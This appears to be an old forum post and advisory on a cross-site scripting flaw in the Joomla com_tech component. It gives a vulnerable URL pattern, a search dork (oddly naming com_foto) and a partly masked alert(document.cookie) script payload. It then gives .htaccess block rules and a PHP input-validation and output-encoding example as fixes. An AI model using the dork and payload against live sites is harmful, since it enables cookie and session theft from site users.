Joomla Component(com_tech) ~ XSS Vuln.

endLesS

Webmaster
<------------------- header data start ------------------- >
#############################################################
Joomla Component Com_tech XSS Vulnerability
#############################################################

# Author : [qrusher-] ~ Bug Researchers

# Date : 07.08.2011

# Name : Joomla com_tech

# Bug Type : XSS

# Infection : Access to information can be obtained.

# Example Vuln :

[+]/index.php?option=com_tech&task=categoria&id_categoria=[EXPLOIT]

[+] Dork:inurl: com_foto

[+] Demo: http://site/index.php?option=com_tech&task=

#############################################################

< ------------------- header data end of ------------------- >


< -- bug code start -- >

>**********alert(document.cookie)</script> // Post Search Box

< -- bug code end of -- >



Many alternatives exist, but if we edit the .htaccess file a little, the problem will go away.


< -- bug code start -- >


Write the code below into the .htaccess file; your site will then return an error on any XSS
attack made against it.

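RewriteEngine On
# Block base64_encode(...) in the query string
RewriteCond %{QUERY_STRING} base64_encode.*\(.*\) [OR]
# Block <script> tags, raw or URL-encoded
RewriteCond %{QUERY_STRING} (\<|%3C).*script.*(\>|%3E) [NC,OR]
# Block attempts to set PHP GLOBALS or _REQUEST through the URL
RewriteCond %{QUERY_STRING} GLOBALS(=|\[|\%[0-9A-Z]{0,2}) [OR]
RewriteCond %{QUERY_STRING} _REQUEST(=|\[|\%[0-9A-Z]{0,2})
# Answer matching requests with 403 Forbidden
RewriteRule ^(.*)$ index.php [F,L]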


< -- bug code end of -- >
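
An added example, not part of the original post and not com_tech's own code: the rewrite conditions inspect only %{QUERY_STRING}, so validating and encoding inside the component also covers the search box POST. The helper names, the search field name `q` and the sample requests are assumptions; `id_categoria` is the parameter named in the advisory.

```php
<?php
// Added example: hypothetical helpers, not com_tech's real code.

/**
 * Return id_categoria as a positive integer, or null when the value
 * is anything else (markup, empty string, array, negative number).
 */
function tech_category_id(array $request): ?int
{
    $raw = $request['id_categoria'] ?? null;
    if (!is_string($raw) && !is_int($raw)) {
        return null;
    }
    $id = filter_var($raw, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $id === false ? null : $id;
}

/** Encode untrusted text for an HTML body or a quoted attribute. */
function tech_html(string $text): string
{
    return htmlspecialchars($text, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

/** Echo the search term back into the page the way a results view would. */
function tech_render_search(array $post): string
{
    // Field name "q" is an assumption; arrays and missing values become ''.
    $term = isset($post['q']) && is_string($post['q']) ? $post['q'] : '';
    $safe = tech_html($term);
    return '<input type="text" name="q" value="' . $safe . '">'
         . '<p>Results for: ' . $safe . '</p>';
}

// Constructed sample requests: one ordinary, one carrying markup.
$samples = [
    ['id_categoria' => '12', 'q' => 'router'],
    ['id_categoria' => '12"><b>x</b>', 'q' => '"><b>x</b>'],
];
foreach ($samples as $req) {
    $id = tech_category_id($req);
    echo ($id === null ? 'rejected id' : "id=$id"), "\n";
    echo tech_render_search($req), "\n";
}
```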
 